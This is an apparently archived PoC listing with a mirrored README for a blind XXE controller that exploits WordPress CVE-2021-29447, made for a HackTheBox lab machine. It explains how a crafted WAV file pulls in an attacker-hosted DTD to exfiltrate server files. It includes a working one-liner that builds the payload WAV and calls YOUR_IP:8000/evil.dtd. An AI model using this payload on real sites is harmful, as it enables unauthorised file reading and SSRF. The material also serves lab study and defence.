POC详情: 55961006fa1b807515c472030622ca234b2753ce

来源
https://github.com/elf1337/blind-xxe-controller-CVE-2021-29447
关联漏洞
标题: WordPress 代码问题漏洞 (CVE-2021-29447)
描述:WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 存在代码问题漏洞,攻击者可利用该漏洞在成功的XXE攻击中可以访问内部文件。
描述
Arbitrary file read controller based on CVE-2021-29447
介绍
## Blind XXE controller

I make this controller on doing metatwo machine in HackTheBox to exploiting CVE-2021-29447 which Is a WordPress XXE Vulnerability in Media Library affected version 5.7, 5.6.2, 5.6.1, 5.6, 5.0.11. where an authenticated user with ability to upload media library can upload malicious wav file that could lead to remote  arbitrary file read and server side request forgery (SSRF)

To exploit these vulnerabilitie, it takes multiple steps to complete a successful attack.That is the result of parsed iXML metadata is not sent back to the user, so to exploit it we need a blind XXE payload. This is doable by including an external Document Type Definition DTD controlled by the attacker and  we need to created the malicious wav file for getting back the connection on attacker listening server. Once we done these steps upload the wav file to server wait for receives an HTTP request that includes the base64 encoded content of our payload file eg: /etc/passwd and decode the base64. This controller has all solutions for these multiple steps. You only need type the filename on the controller **$console >** 

Detailed blog [https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/](https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/)


Note: This controller is fully configured to HTB metatwo machine. Any outside use you need too make some changes in scripts

### Usage

Create a wave file named **payload.wav**

```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOUR_IP:8000/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```

run **main.py**

```bash
python3 main.py listen_ip
```

#### POC image

![/poc/poc.png](/poc/poc.png)
文件快照

 [4.0K]  /data/pocs/55961006fa1b807515c472030622ca234b2753ce
├── [1.7K]  controller.py
├── [1.1K]  listener.py
├── [ 668]  main.py
├── [4.0K]  poc
│   └── [193K]  poc.png
└── [1.7K]  README.md

1 directory, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。